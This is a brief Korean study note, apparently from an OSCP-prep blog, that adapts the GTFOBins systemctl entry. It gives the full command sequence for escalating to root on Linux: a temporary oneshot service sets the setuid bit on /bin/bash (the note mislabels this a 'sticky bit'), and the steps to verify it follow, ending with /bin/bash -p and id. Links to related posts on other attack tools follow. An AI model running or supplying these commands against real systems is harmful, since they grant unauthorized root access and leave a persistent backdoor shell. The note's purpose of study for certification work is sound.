https://gtfobins.github.io/gtfobins/systemctl/
1. systemctl 경로를 환경에 맞게 수정
2. bash 권한에 스티키 비트 추가 구문 수정
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
위 명령 실행 후.. 스티키비트 생성 확인
$ ls -l /bin/bash
루트 권한 확인
$ /bin/bash -p
-p: posix모드..?
$ id
'OSCP > 도구 개념 정리' 카테고리의 다른 글
Exploiting wildcards on Linux - 권한상승 (0) | 2020.04.24 |
---|---|
Meterpreter (0) | 2020.04.13 |
Nmap, Gobuster, JohnTheRipper (0) | 2020.04.13 |
Pivoting, 터널링, 포트포워딩, SSH, 프록시, Proxychains (0) | 2020.03.26 |
VIM 명령어 별도 정리 (0) | 2020.02.05 |